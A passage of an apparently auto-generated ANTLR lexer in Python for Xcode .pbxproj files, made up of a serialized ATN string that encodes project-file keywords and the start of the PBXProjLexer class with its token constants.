buf.write("\7i\2\2\u05d1\u05d2\7g\2\2\u05d2\u05d3\7v\2\2\u05d3\u05d4")
buf.write("\7K\2\2\u05d4\u05d5\7F\2\2\u05d5\u009c\3\2\2\2\u05d6\u05d7")
buf.write("\7F\2\2\u05d7\u05d8\7g\2\2\u05d8\u05d9\7x\2\2\u05d9\u05da")
buf.write("\7g\2\2\u05da\u05db\7n\2\2\u05db\u05dc\7q\2\2\u05dc\u05dd")
buf.write("\7r\2\2\u05dd\u05de\7o\2\2\u05de\u05df\7g\2\2\u05df\u05e0")
buf.write("\7p\2\2\u05e0\u05e1\7v\2\2\u05e1\u05e2\7V\2\2\u05e2\u05e3")
buf.write("\7g\2\2\u05e3\u05e4\7c\2\2\u05e4\u05e5\7o\2\2\u05e5\u009e")
buf.write("\3\2\2\2\u05e6\u05e7\7R\2\2\u05e7\u05e8\7t\2\2\u05e8\u05e9")
buf.write("\7q\2\2\u05e9\u05ea\7x\2\2\u05ea\u05eb\7k\2\2\u05eb\u05ec")
buf.write("\7u\2\2\u05ec\u05ed\7k\2\2\u05ed\u05ee\7q\2\2\u05ee\u05ef")
buf.write("\7p\2\2\u05ef\u05f0\7k\2\2\u05f0\u05f1\7p\2\2\u05f1\u05f2")
buf.write("\7i\2\2\u05f2\u05f3\7U\2\2\u05f3\u05f4\7v\2\2\u05f4\u05f5")
buf.write("\7{\2\2\u05f5\u05f6\7n\2\2\u05f6\u05f7\7g\2\2\u05f7\u00a0")
buf.write("\3\2\2\2\u05f8\u05f9\7e\2\2\u05f9\u05fa\7q\2\2\u05fa\u05fb")
buf.write("\7o\2\2\u05fb\u05fc\7r\2\2\u05fc\u05fd\7c\2\2\u05fd\u05fe")
buf.write("\7v\2\2\u05fe\u05ff\7k\2\2\u05ff\u0600\7d\2\2\u0600\u0601")
buf.write("\7k\2\2\u0601\u0602\7n\2\2\u0602\u0603\7k\2\2\u0603\u0604")
buf.write("\7v\2\2\u0604\u0605\7{\2\2\u0605\u0606\7X\2\2\u0606\u0607")
buf.write("\7g\2\2\u0607\u0608\7t\2\2\u0608\u0609\7u\2\2\u0609\u060a")
buf.write("\7k\2\2\u060a\u060b\7q\2\2\u060b\u060c\7p\2\2\u060c\u00a2")
buf.write("\3\2\2\2\u060d\u060e\7f\2\2\u060e\u060f\7g\2\2\u060f\u0610")
buf.write("\7x\2\2\u0610\u0611\7g\2\2\u0611\u0612\7n\2\2\u0612\u0613")
buf.write("\7q\2\2\u0613\u0614\7r\2\2\u0614\u0615\7o\2\2\u0615\u0616")
buf.write("\7g\2\2\u0616\u0617\7p\2\2\u0617\u0618\7v\2\2\u0618\u0619")
buf.write("\7T\2\2\u0619\u061a\7g\2\2\u061a\u061b\7i\2\2\u061b\u061c")
buf.write("\7k\2\2\u061c\u061d\7q\2\2\u061d\u061e\7p\2\2\u061e\u00a4")
buf.write("\3\2\2\2\u061f\u0620\7j\2\2\u0620\u0621\7c\2\2\u0621\u0622")
buf.write("\7u\2\2\u0622\u0623\7U\2\2\u0623\u0624\7e\2\2\u0624\u0625")
buf.write("\7c\2\2\u0625\u0626\7p\2\2\u0626\u0627\7p\2\2\u0627\u0628")
buf.write("\7g\2\2\u0628\u0629\7f\2\2\u0629\u062a\7H\2\2\u062a\u062b")
buf.write("\7q\2\2\u062b\u062c\7t\2\2\u062c\u062d\7G\2\2\u062d\u062e")
buf.write("\7p\2\2\u062e\u062f\7e\2\2\u062f\u0630\7q\2\2\u0630\u0631")
buf.write("\7f\2\2\u0631\u0632\7k\2\2\u0632\u0633\7p\2\2\u0633\u0634")
buf.write("\7i\2\2\u0634\u0635\7u\2\2\u0635\u00a6\3\2\2\2\u0636\u0637")
buf.write("\7m\2\2\u0637\u0638\7p\2\2\u0638\u0639\7q\2\2\u0639\u063a")
buf.write("\7y\2\2\u063a\u063b\7p\2\2\u063b\u063c\7T\2\2\u063c\u063d")
buf.write("\7g\2\2\u063d\u063e\7i\2\2\u063e\u063f\7k\2\2\u063f\u0640")
buf.write("\7q\2\2\u0640\u0641\7p\2\2\u0641\u0642\7u\2\2\u0642\u00a8")
buf.write("\3\2\2\2\u0643\u0644\7o\2\2\u0644\u0645\7c\2\2\u0645\u0646")
buf.write("\7k\2\2\u0646\u0647\7p\2\2\u0647\u0648\7I\2\2\u0648\u0649")
buf.write("\7t\2\2\u0649\u064a\7q\2\2\u064a\u064b\7w\2\2\u064b\u064c")
buf.write("\7r\2\2\u064c\u00aa\3\2\2\2\u064d\u064e\7r\2\2\u064e\u064f")
buf.write("\7t\2\2\u064f\u0650\7q\2\2\u0650\u0651\7f\2\2\u0651\u0652")
buf.write("\7w\2\2\u0652\u0653\7e\2\2\u0653\u0654\7v\2\2\u0654\u0655")
buf.write("\7T\2\2\u0655\u0656\7g\2\2\u0656\u0657\7h\2\2\u0657\u0658")
buf.write("\7I\2\2\u0658\u0659\7t\2\2\u0659\u065a\7q\2\2\u065a\u065b")
buf.write("\7w\2\2\u065b\u065c\7r\2\2\u065c\u00ac\3\2\2\2\u065d\u065e")
buf.write("\7r\2\2\u065e\u065f\7c\2\2\u065f\u0660\7e\2\2\u0660\u0661")
buf.write("\7m\2\2\u0661\u0662\7c\2\2\u0662\u0663\7i\2\2\u0663\u0664")
buf.write("\7g\2\2\u0664\u0665\7T\2\2\u0665\u0666\7g\2\2\u0666\u0667")
buf.write("\7h\2\2\u0667\u0668\7g\2\2\u0668\u0669\7t\2\2\u0669\u066a")
buf.write("\7g\2\2\u066a\u066b\7p\2\2\u066b\u066c\7e\2\2\u066c\u066d")
buf.write("\7g\2\2\u066d\u066e\7u\2\2\u066e\u00ae\3\2\2\2\u066f\u0670")
buf.write("\7r\2\2\u0670\u0671\7t\2\2\u0671\u0672\7q\2\2\u0672\u0673")
buf.write("\7l\2\2\u0673\u0674\7g\2\2\u0674\u0675\7e\2\2\u0675\u0676")
buf.write("\7v\2\2\u0676\u0677\7F\2\2\u0677\u0678\7k\2\2\u0678\u0679")
buf.write("\7t\2\2\u0679\u067a\7R\2\2\u067a\u067b\7c\2\2\u067b\u067c")
buf.write("\7v\2\2\u067c\u067d\7j\2\2\u067d\u00b0\3\2\2\2\u067e\u067f")
buf.write("\7r\2\2\u067f\u0680\7t\2\2\u0680\u0681\7q\2\2\u0681\u0682")
buf.write("\7l\2\2\u0682\u0683\7g\2\2\u0683\u0684\7e\2\2\u0684\u0685")
buf.write("\7v\2\2\u0685\u0686\7T\2\2\u0686\u0687\7g\2\2\u0687\u0688")
buf.write("\7h\2\2\u0688\u0689\7g\2\2\u0689\u068a\7t\2\2\u068a\u068b")
buf.write("\7g\2\2\u068b\u068c\7p\2\2\u068c\u068d\7e\2\2\u068d\u068e")
buf.write("\7g\2\2\u068e\u068f\7u\2\2\u068f\u00b2\3\2\2\2\u0690\u0691")
buf.write("\7r\2\2\u0691\u0692\7t\2\2\u0692\u0693\7q\2\2\u0693\u0694")
buf.write("\7l\2\2\u0694\u0695\7g\2\2\u0695\u0696\7e\2\2\u0696\u0697")
buf.write("\7v\2\2\u0697\u0698\7T\2\2\u0698\u0699\7q\2\2\u0699\u069a")
buf.write("\7q\2\2\u069a\u069b\7v\2\2\u069b\u00b4\3\2\2\2\u069c\u069d")
buf.write("\7v\2\2\u069d\u069e\7c\2\2\u069e\u069f\7t\2\2\u069f\u06a0")
buf.write("\7i\2\2\u06a0\u06a1\7g\2\2\u06a1\u06a2\7v\2\2\u06a2\u06a3")
buf.write("\7u\2\2\u06a3\u00b6\3\2\2\2\u06a4\u06a5\7k\2\2\u06a5\u06a6")
buf.write("\7p\2\2\u06a6\u06a7\7r\2\2\u06a7\u06a8\7w\2\2\u06a8\u06a9")
buf.write("\7v\2\2\u06a9\u06aa\7H\2\2\u06aa\u06ab\7k\2\2\u06ab\u06ac")
buf.write("\7n\2\2\u06ac\u06ad\7g\2\2\u06ad\u06ae\7N\2\2\u06ae\u06af")
buf.write("\7k\2\2\u06af\u06b0\7u\2\2\u06b0\u06b1\7v\2\2\u06b1\u06b2")
buf.write("\7R\2\2\u06b2\u06b3\7c\2\2\u06b3\u06b4\7v\2\2\u06b4\u06b5")
buf.write("\7j\2\2\u06b5\u06b6\7u\2\2\u06b6\u00b8\3\2\2\2\u06b7\u06b8")
buf.write("\7k\2\2\u06b8\u06b9\7p\2\2\u06b9\u06ba\7r\2\2\u06ba\u06bb")
buf.write("\7w\2\2\u06bb\u06bc\7v\2\2\u06bc\u06bd\7R\2\2\u06bd\u06be")
buf.write("\7c\2\2\u06be\u06bf\7v\2\2\u06bf\u06c0\7j\2\2\u06c0\u06c1")
buf.write("\7u\2\2\u06c1\u00ba\3\2\2\2\u06c2\u06c3\7q\2\2\u06c3\u06c4")
buf.write("\7w\2\2\u06c4\u06c5\7v\2\2\u06c5\u06c6\7r\2\2\u06c6\u06c7")
buf.write("\7w\2\2\u06c7\u06c8\7v\2\2\u06c8\u06c9\7H\2\2\u06c9\u06ca")
buf.write("\7k\2\2\u06ca\u06cb\7n\2\2\u06cb\u06cc\7g\2\2\u06cc\u06cd")
buf.write("\7N\2\2\u06cd\u06ce\7k\2\2\u06ce\u06cf\7u\2\2\u06cf\u06d0")
buf.write("\7v\2\2\u06d0\u06d1\7R\2\2\u06d1\u06d2\7c\2\2\u06d2\u06d3")
buf.write("\7v\2\2\u06d3\u06d4\7j\2\2\u06d4\u06d5\7u\2\2\u06d5\u00bc")
buf.write("\3\2\2\2\u06d6\u06d7\7q\2\2\u06d7\u06d8\7w\2\2\u06d8\u06d9")
buf.write("\7v\2\2\u06d9\u06da\7r\2\2\u06da\u06db\7w\2\2\u06db\u06dc")
buf.write("\7v\2\2\u06dc\u06dd\7R\2\2\u06dd\u06de\7c\2\2\u06de\u06df")
buf.write("\7v\2\2\u06df\u06e0\7j\2\2\u06e0\u06e1\7u\2\2\u06e1\u00be")
buf.write("\3\2\2\2\u06e2\u06e3\7u\2\2\u06e3\u06e4\7j\2\2\u06e4\u06e5")
buf.write("\7g\2\2\u06e5\u06e6\7n\2\2\u06e6\u06e7\7n\2\2\u06e7\u06e8")
buf.write("\7R\2\2\u06e8\u06e9\7c\2\2\u06e9\u06ea\7v\2\2\u06ea\u06eb")
buf.write("\7j\2\2\u06eb\u00c0\3\2\2\2\u06ec\u06ed\7u\2\2\u06ed\u06ee")
buf.write("\7j\2\2\u06ee\u06ef\7g\2\2\u06ef\u06f0\7n\2\2\u06f0\u06f1")
buf.write("\7n\2\2\u06f1\u06f2\7U\2\2\u06f2\u06f3\7e\2\2\u06f3\u06f4")
buf.write("\7t\2\2\u06f4\u06f5\7k\2\2\u06f5\u06f6\7r\2\2\u06f6\u06f7")
buf.write("\7v\2\2\u06f7\u00c2\3\2\2\2\u06f8\u06f9\7u\2\2\u06f9\u06fa")
buf.write("\7j\2\2\u06fa\u06fb\7q\2\2\u06fb\u06fc\7y\2\2\u06fc\u06fd")
buf.write("\7G\2\2\u06fd\u06fe\7p\2\2\u06fe\u06ff\7x\2\2\u06ff\u0700")
buf.write("\7X\2\2\u0700\u0701\7c\2\2\u0701\u0702\7t\2\2\u0702\u0703")
buf.write("\7u\2\2\u0703\u0704\7K\2\2\u0704\u0705\7p\2\2\u0705\u0706")
buf.write("\7N\2\2\u0706\u0707\7q\2\2\u0707\u0708\7i\2\2\u0708\u00c4")
buf.write("\3\2\2\2\u0709\u070a\7v\2\2\u070a\u070b\7c\2\2\u070b\u070c")
buf.write("\7t\2\2\u070c\u070d\7i\2\2\u070d\u070e\7g\2\2\u070e\u070f")
buf.write("\7v\2\2\u070f\u00c6\3\2\2\2\u0710\u0711\7v\2\2\u0711\u0712")
buf.write("\7c\2\2\u0712\u0713\7t\2\2\u0713\u0714\7i\2\2\u0714\u0715")
buf.write("\7g\2\2\u0715\u0716\7v\2\2\u0716\u0717\7R\2\2\u0717\u0718")
buf.write("\7t\2\2\u0718\u0719\7q\2\2\u0719\u071a\7z\2\2\u071a\u071b")
buf.write("\7{\2\2\u071b\u00c8\3\2\2\2\u071c\u071d\7h\2\2\u071d\u071e")
buf.write("\7k\2\2\u071e\u071f\7n\2\2\u071f\u0720\7g\2\2\u0720\u0721")
buf.write("\7V\2\2\u0721\u0722\7{\2\2\u0722\u0723\7r\2\2\u0723\u0724")
buf.write("\7g\2\2\u0724\u00ca\3\2\2\2\u0725\u0726\7t\2\2\u0726\u0727")
buf.write("\7g\2\2\u0727\u0728\7o\2\2\u0728\u0729\7q\2\2\u0729\u072a")
buf.write("\7v\2\2\u072a\u072b\7g\2\2\u072b\u072c\7T\2\2\u072c\u072d")
buf.write("\7g\2\2\u072d\u072e\7h\2\2\u072e\u00cc\3\2\2\2\u072f\u0730")
buf.write("\7d\2\2\u0730\u0731\7c\2\2\u0731\u0732\7u\2\2\u0732\u0733")
buf.write("\7g\2\2\u0733\u0734\7E\2\2\u0734\u0735\7q\2\2\u0735\u0736")
buf.write("\7p\2\2\u0736\u0737\7h\2\2\u0737\u0738\7k\2\2\u0738\u0739")
buf.write("\7i\2\2\u0739\u073a\7w\2\2\u073a\u073b\7t\2\2\u073b\u073c")
buf.write("\7c\2\2\u073c\u073d\7v\2\2\u073d\u073e\7k\2\2\u073e\u073f")
buf.write("\7q\2\2\u073f\u0740\7p\2\2\u0740\u0741\7T\2\2\u0741\u0742")
buf.write("\7g\2\2\u0742\u0743\7h\2\2\u0743\u0744\7g\2\2\u0744\u0745")
buf.write("\7t\2\2\u0745\u0746\7g\2\2\u0746\u0747\7p\2\2\u0747\u0748")
buf.write("\7e\2\2\u0748\u0749\7g\2\2\u0749\u00ce\3\2\2\2\u074a\u074b")
buf.write("\7d\2\2\u074b\u074c\7w\2\2\u074c\u074d\7k\2\2\u074d\u074e")
buf.write("\7n\2\2\u074e\u074f\7f\2\2\u074f\u0750\7U\2\2\u0750\u0751")
buf.write("\7g\2\2\u0751\u0752\7v\2\2\u0752\u0753\7v\2\2\u0753\u0754")
buf.write("\7k\2\2\u0754\u0755\7p\2\2\u0755\u0756\7i\2\2\u0756\u0757")
buf.write("\7u\2\2\u0757\u00d0\3\2\2\2\u0758\u0759\7f\2\2\u0759\u075a")
buf.write("\7u\2\2\u075a\u075b\7v\2\2\u075b\u075c\7R\2\2\u075c\u075d")
buf.write("\7c\2\2\u075d\u075e\7v\2\2\u075e\u075f\7j\2\2\u075f\u00d2")
buf.write("\3\2\2\2\u0760\u0761\7f\2\2\u0761\u0762\7u\2\2\u0762\u0763")
buf.write("\7v\2\2\u0763\u0764\7U\2\2\u0764\u0765\7w\2\2\u0765\u0766")
buf.write("\7d\2\2\u0766\u0767\7h\2\2\u0767\u0768\7q\2\2\u0768\u0769")
buf.write("\7n\2\2\u0769\u076a\7f\2\2\u076a\u076b\7g\2\2\u076b\u076c")
buf.write("\7t\2\2\u076c\u076d\7U\2\2\u076d\u076e\7r\2\2\u076e\u076f")
buf.write("\7g\2\2\u076f\u0770\7e\2\2\u0770\u00d4\3\2\2\2\u0771\u0772")
buf.write("\7R\2\2\u0772\u0773\7t\2\2\u0773\u0774\7q\2\2\u0774\u0775")
buf.write("\7f\2\2\u0775\u0776\7w\2\2\u0776\u0777\7e\2\2\u0777\u0778")
buf.write("\7v\2\2\u0778\u0779\7I\2\2\u0779\u077a\7t\2\2\u077a\u077b")
buf.write("\7q\2\2\u077b\u077c\7w\2\2\u077c\u077d\7r\2\2\u077d\u00d6")
buf.write("\3\2\2\2\u077e\u077f\7R\2\2\u077f\u0780\7t\2\2\u0780\u0781")
buf.write("\7q\2\2\u0781\u0782\7l\2\2\u0782\u0783\7g\2\2\u0783\u0784")
buf.write("\7e\2\2\u0784\u0785\7v\2\2\u0785\u0786\7T\2\2\u0786\u0787")
buf.write("\7g\2\2\u0787\u0788\7h\2\2\u0788\u00d8\3\2\2\2\u0789\u078a")
buf.write("\7d\2\2\u078a\u078b\7w\2\2\u078b\u078c\7k\2\2\u078c\u078d")
buf.write("\7n\2\2\u078d\u078e\7f\2\2\u078e\u078f\7E\2\2\u078f\u0790")
buf.write("\7q\2\2\u0790\u0791\7p\2\2\u0791\u0792\7h\2\2\u0792\u0793")
buf.write("\7k\2\2\u0793\u0794\7i\2\2\u0794\u0795\7w\2\2\u0795\u0796")
buf.write("\7t\2\2\u0796\u0797\7c\2\2\u0797\u0798\7v\2\2\u0798\u0799")
buf.write("\7k\2\2\u0799\u079a\7q\2\2\u079a\u079b\7p\2\2\u079b\u079c")
buf.write("\7u\2\2\u079c\u00da\3\2\2\2\u079d\u079e\7f\2\2\u079e\u079f")
buf.write("\7g\2\2\u079f\u07a0\7h\2\2\u07a0\u07a1\7c\2\2\u07a1\u07a2")
buf.write("\7w\2\2\u07a2\u07a3\7n\2\2\u07a3\u07a4\7v\2\2\u07a4\u07a5")
buf.write("\7E\2\2\u07a5\u07a6\7q\2\2\u07a6\u07a7\7p\2\2\u07a7\u07a8")
buf.write("\7h\2\2\u07a8\u07a9\7k\2\2\u07a9\u07aa\7i\2\2\u07aa\u07ab")
buf.write("\7w\2\2\u07ab\u07ac\7t\2\2\u07ac\u07ad\7c\2\2\u07ad\u07ae")
buf.write("\7v\2\2\u07ae\u07af\7k\2\2\u07af\u07b0\7q\2\2\u07b0\u07b1")
buf.write("\7p\2\2\u07b1\u07b2\7K\2\2\u07b2\u07b3\7u\2\2\u07b3\u07b4")
buf.write("\7X\2\2\u07b4\u07b5\7k\2\2\u07b5\u07b6\7u\2\2\u07b6\u07b7")
buf.write("\7k\2\2\u07b7\u07b8\7d\2\2\u07b8\u07b9\7n\2\2\u07b9\u07ba")
buf.write("\7g\2\2\u07ba\u00dc\3\2\2\2\u07bb\u07bc\7f\2\2\u07bc\u07bd")
buf.write("\7g\2\2\u07bd\u07be\7h\2\2\u07be\u07bf\7c\2\2\u07bf\u07c0")
buf.write("\7w\2\2\u07c0\u07c1\7n\2\2\u07c1\u07c2\7v\2\2\u07c2\u07c3")
buf.write("\7E\2\2\u07c3\u07c4\7q\2\2\u07c4\u07c5\7p\2\2\u07c5\u07c6")
buf.write("\7h\2\2\u07c6\u07c7\7k\2\2\u07c7\u07c8\7i\2\2\u07c8\u07c9")
buf.write("\7w\2\2\u07c9\u07ca\7t\2\2\u07ca\u07cb\7c\2\2\u07cb\u07cc")
buf.write("\7v\2\2\u07cc\u07cd\7k\2\2\u07cd\u07ce\7q\2\2\u07ce\u07cf")
buf.write("\7p\2\2\u07cf\u07d0\7P\2\2\u07d0\u07d1\7c\2\2\u07d1\u07d2")
buf.write("\7o\2\2\u07d2\u07d3\7g\2\2\u07d3\u00de\3\2\2\2\u07d4\u07d5")
buf.write("\7u\2\2\u07d5\u07d6\7g\2\2\u07d6\u07d7\7v\2\2\u07d7\u07d8")
buf.write("\7v\2\2\u07d8\u07d9\7k\2\2\u07d9\u07da\7p\2\2\u07da\u07db")
buf.write("\7i\2\2\u07db\u07dc\7u\2\2\u07dc\u00e0\3\2\2\2\u07dd\u07de")
buf.write("\7U\2\2\u07de\u07df\7{\2\2\u07df\u07e0\7u\2\2\u07e0\u07e1")
buf.write("\7v\2\2\u07e1\u07e2\7g\2\2\u07e2\u07e3\7o\2\2\u07e3\u07e4")
buf.write("\7E\2\2\u07e4\u07e5\7c\2\2\u07e5\u07e6\7r\2\2\u07e6\u07e7")
buf.write("\7c\2\2\u07e7\u07e8\7d\2\2\u07e8\u07e9\7k\2\2\u07e9\u07ea")
buf.write("\7n\2\2\u07ea\u07eb\7k\2\2\u07eb\u07ec\7v\2\2\u07ec\u07ed")
buf.write("\7k\2\2\u07ed\u07ee\7g\2\2\u07ee\u07ef\7u\2\2\u07ef\u00e2")
buf.write("\3\2\2\2\u07f0\u07f1\7e\2\2\u07f1\u07f2\7w\2\2\u07f2\u07f3")
buf.write("\7t\2\2\u07f3\u07f4\7t\2\2\u07f4\u07f5\7g\2\2\u07f5\u07f6")
buf.write("\7p\2\2\u07f6\u07f7\7v\2\2\u07f7\u07f8\7X\2\2\u07f8\u07f9")
buf.write("\7g\2\2\u07f9\u07fa\7t\2\2\u07fa\u07fb\7u\2\2\u07fb\u07fc")
buf.write("\7k\2\2\u07fc\u07fd\7q\2\2\u07fd\u07fe\7p\2\2\u07fe\u00e4")
buf.write("\3\2\2\2\u07ff\u0800\7x\2\2\u0800\u0801\7g\2\2\u0801\u0802")
buf.write("\7t\2\2\u0802\u0803\7u\2\2\u0803\u0804\7k\2\2\u0804\u0805")
buf.write("\7q\2\2\u0805\u0806\7p\2\2\u0806\u0807\7I\2\2\u0807\u0808")
buf.write("\7t\2\2\u0808\u0809\7q\2\2\u0809\u080a\7w\2\2\u080a\u080b")
buf.write("\7r\2\2\u080b\u080c\7V\2\2\u080c\u080d\7{\2\2\u080d\u080e")
buf.write("\7r\2\2\u080e\u080f\7g\2\2\u080f\u00e6\3\2\2\2\u0810\u0811")
buf.write("\7E\2\2\u0811\u0812\7N\2\2\u0812\u0813\7C\2\2\u0813\u0814")
buf.write("\7U\2\2\u0814\u0815\7U\2\2\u0815\u0816\7R\2\2\u0816\u0817")
buf.write("\7T\2\2\u0817\u0818\7G\2\2\u0818\u0819\7H\2\2\u0819\u081a")
buf.write("\7K\2\2\u081a\u081b\7Z\2\2\u081b\u00e8\3\2\2\2\u081c\u081d")
buf.write("\7e\2\2\u081d\u081e\7n\2\2\u081e\u081f\7c\2\2\u081f\u0820")
buf.write("\7u\2\2\u0820\u0821\7u\2\2\u0821\u0822\7g\2\2\u0822\u0823")
buf.write("\7u\2\2\u0823\u00ea\3\2\2\2\u0824\u0825\7k\2\2\u0825\u0826")
buf.write("\7u\2\2\u0826\u0827\7c\2\2\u0827\u00ec\3\2\2\2\u0828\u0829")
buf.write("\7q\2\2\u0829\u082a\7d\2\2\u082a\u082b\7l\2\2\u082b\u082c")
buf.write("\7g\2\2\u082c\u082d\7e\2\2\u082d\u082e\7v\2\2\u082e\u082f")
buf.write("\7u\2\2\u082f\u00ee\3\2\2\2\u0830\u0831\7t\2\2\u0831\u0832")
buf.write("\7q\2\2\u0832\u0833\7q\2\2\u0833\u0834\7v\2\2\u0834\u0835")
buf.write("\7Q\2\2\u0835\u0836\7d\2\2\u0836\u0837\7l\2\2\u0837\u0838")
buf.write("\7g\2\2\u0838\u0839\7e\2\2\u0839\u083a\7v\2\2\u083a\u00f0")
buf.write("\3\2\2\2\u083b\u083d\4\62;\2\u083c\u083b\3\2\2\2\u083d")
buf.write("\u083e\3\2\2\2\u083e\u083c\3\2\2\2\u083e\u083f\3\2\2\2")
buf.write("\u083f\u00f2\3\2\2\2\u0840\u0841\7\60\2\2\u0841\u00f4")
buf.write("\3\2\2\2\u0842\u0843\t\2\2\2\u0843\u00f6\3\2\2\2\u0844")
buf.write("\u0845\t\3\2\2\u0845\u00f8\3\2\2\2\u0846\u0847\7/\2\2")
buf.write("\u0847\u00fa\3\2\2\2\u0848\u0849\7a\2\2\u0849\u00fc\3")
buf.write("\2\2\2\u084a\u084b\7\61\2\2\u084b\u00fe\3\2\2\2\u084c")
buf.write("\u084d\5\u0107\u0084\2\u084d\u084e\5\u0107\u0084\2\u084e")
buf.write("\u084f\5\u0107\u0084\2\u084f\u0850\5\u0107\u0084\2\u0850")
buf.write("\u0851\5\u0107\u0084\2\u0851\u0852\5\u0107\u0084\2\u0852")
buf.write("\u0853\5\u0107\u0084\2\u0853\u0854\5\u0107\u0084\2\u0854")
buf.write("\u0855\5\u0107\u0084\2\u0855\u0856\5\u0107\u0084\2\u0856")
buf.write("\u0857\5\u0107\u0084\2\u0857\u0858\5\u0107\u0084\2\u0858")
buf.write("\u0859\5\u0107\u0084\2\u0859\u085a\5\u0107\u0084\2\u085a")
buf.write("\u085b\5\u0107\u0084\2\u085b\u085c\5\u0107\u0084\2\u085c")
buf.write("\u085d\5\u0107\u0084\2\u085d\u085e\5\u0107\u0084\2\u085e")
buf.write("\u085f\5\u0107\u0084\2\u085f\u0860\5\u0107\u0084\2\u0860")
buf.write("\u0861\5\u0107\u0084\2\u0861\u0862\5\u0107\u0084\2\u0862")
buf.write("\u0863\5\u0107\u0084\2\u0863\u0864\5\u0107\u0084\2\u0864")
buf.write("\u088b\3\2\2\2\u0865\u0866\7H\2\2\u0866\u0867\7T\2\2\u0867")
buf.write("\u086b\7a\2\2\u0868\u0869\7I\2\2\u0869\u086b\7a\2\2\u086a")
buf.write("\u0865\3\2\2\2\u086a\u0868\3\2\2\2\u086b\u086d\3\2\2\2")
buf.write("\u086c\u086e\5\u0107\u0084\2\u086d\u086c\3\2\2\2\u086e")
buf.write("\u086f\3\2\2\2\u086f\u086d\3\2\2\2\u086f\u0870\3\2\2\2")
buf.write("\u0870\u088b\3\2\2\2\u0871\u0872\5\u00f7|\2\u0872\u0873")
buf.write("\5\u00f7|\2\u0873\u0874\5\u00f7|\2\u0874\u0875\5\u00f7")
buf.write("|\2\u0875\u0876\5\u00f7|\2\u0876\u0877\5\u00f7|\2\u0877")
buf.write("\u0878\5\u00f7|\2\u0878\u0879\5\u00f7|\2\u0879\u087a\5")
buf.write("\u00f7|\2\u087a\u087b\5\u00f7|\2\u087b\u087c\5\u00f7|")
buf.write("\2\u087c\u087d\5\u00f7|\2\u087d\u087e\5\u00f7|\2\u087e")
buf.write("\u087f\5\u00f7|\2\u087f\u0880\5\u00f7|\2\u0880\u0881\5")
buf.write("\u00f7|\2\u0881\u0882\5\u00f7|\2\u0882\u0883\5\u00f7|")
buf.write("\2\u0883\u0884\5\u00f7|\2\u0884\u0885\5\u00f7|\2\u0885")
buf.write("\u0886\5\u00f7|\2\u0886\u0887\5\u00f7|\2\u0887\u0888\5")
buf.write("\u00f7|\2\u0888\u0889\5\u00f7|\2\u0889\u088b\3\2\2\2\u088a")
buf.write("\u084c\3\2\2\2\u088a\u086a\3\2\2\2\u088a\u0871\3\2\2\2")
buf.write("\u088b\u0100\3\2\2\2\u088c\u088e\7$\2\2\u088d\u088f\5")
buf.write("\u0109\u0085\2\u088e\u088d\3\2\2\2\u088f\u0890\3\2\2\2")
buf.write("\u0890\u088e\3\2\2\2\u0890\u0891\3\2\2\2\u0891\u0892\3")
buf.write("\2\2\2\u0892\u0893\7$\2\2\u0893\u0897\3\2\2\2\u0894\u0895")
buf.write("\7$\2\2\u0895\u0897\7$\2\2\u0896\u088c\3\2\2\2\u0896\u0894")
buf.write("\3\2\2\2\u0897\u0102\3\2\2\2\u0898\u089e\5\u00f5{\2\u0899")
buf.write("\u089e\5\u00fb~\2\u089a\u089e\5\u00f9}\2\u089b\u089e\5")
buf.write("\u00fd\177\2\u089c\u089e\5\u00f3z\2\u089d\u0898\3\2\2")
buf.write("\2\u089d\u0899\3\2\2\2\u089d\u089a\3\2\2\2\u089d\u089b")
buf.write("\3\2\2\2\u089d\u089c\3\2\2\2\u089e\u089f\3\2\2\2\u089f")
buf.write("\u089d\3\2\2\2\u089f\u08a0\3\2\2\2\u08a0\u0104\3\2\2\2")
buf.write("\u08a1\u08a2\7&\2\2\u08a2\u08a3\5\u0103\u0082\2\u08a3")
buf.write("\u0106\3\2\2\2\u08a4\u08a5\t\4\2\2\u08a5\u0108\3\2\2\2")
buf.write("\u08a6\u08aa\n\5\2\2\u08a7\u08a8\7^\2\2\u08a8\u08aa\7")
buf.write("$\2\2\u08a9\u08a6\3\2\2\2\u08a9\u08a7\3\2\2\2\u08aa\u010a")
buf.write("\3\2\2\2\u08ab\u08ad\t\6\2\2\u08ac\u08ab\3\2\2\2\u08ad")
buf.write("\u08ae\3\2\2\2\u08ae\u08ac\3\2\2\2\u08ae\u08af\3\2\2\2")
buf.write("\u08af\u08b0\3\2\2\2\u08b0\u08b1\b\u0086\2\2\u08b1\u010c")
buf.write("\3\2\2\2\u08b2\u08b3\7\61\2\2\u08b3\u08b4\7,\2\2\u08b4")
buf.write("\u08b8\3\2\2\2\u08b5\u08b7\13\2\2\2\u08b6\u08b5\3\2\2")
buf.write("\2\u08b7\u08ba\3\2\2\2\u08b8\u08b9\3\2\2\2\u08b8\u08b6")
buf.write("\3\2\2\2\u08b9\u08bb\3\2\2\2\u08ba\u08b8\3\2\2\2\u08bb")
buf.write("\u08bc\7,\2\2\u08bc\u08bd\7\61\2\2\u08bd\u08be\3\2\2\2")
buf.write("\u08be\u08bf\b\u0087\2\2\u08bf\u010e\3\2\2\2\u08c0\u08c1")
buf.write("\7\61\2\2\u08c1\u08c2\7\61\2\2\u08c2\u08c6\3\2\2\2\u08c3")
buf.write("\u08c5\n\7\2\2\u08c4\u08c3\3\2\2\2\u08c5\u08c8\3\2\2\2")
buf.write("\u08c6\u08c4\3\2\2\2\u08c6\u08c7\3\2\2\2\u08c7\u08c9\3")
buf.write("\2\2\2\u08c8\u08c6\3\2\2\2\u08c9\u08ca\b\u0088\2\2\u08ca")
buf.write("\u0110\3\2\2\2\17\2\u083e\u086a\u086f\u088a\u0890\u0896")
buf.write("\u089d\u089f\u08a9\u08ae\u08b8\u08c6\3\b\2\2")
return buf.getvalue()
class PBXProjLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
T__0 = 1
T__1 = 2
T__2 = 3
T__3 = 4
T__4 = 5
T__5 = 6
T__6 = 7
T__7 = 8
T__8 = 9
T__9 = 10
T__10 = 11
T__11 = 12
T__12 = 13
T__13 = 14
T__14 = 15
T__15 = 16
T__16 = 17
T__17 = 18
T__18 = 19
T__19 = 20
T__20 = 21
T__21 = 22
T__22 = 23
T__23 = 24
T__24 = 25
T__25 = 26
T__26 = 27
T__27 = 28
T__28 = 29
T__29 = 30
T__30 = 31
T__31 = 32
T__32 = 33
T__33 = 34
T__34 = 35
T__35 = 36
T__36 = 37
T__37 = 38
T__38 = 39
T__39 = 40
T__40 = 41
T__41 = 42
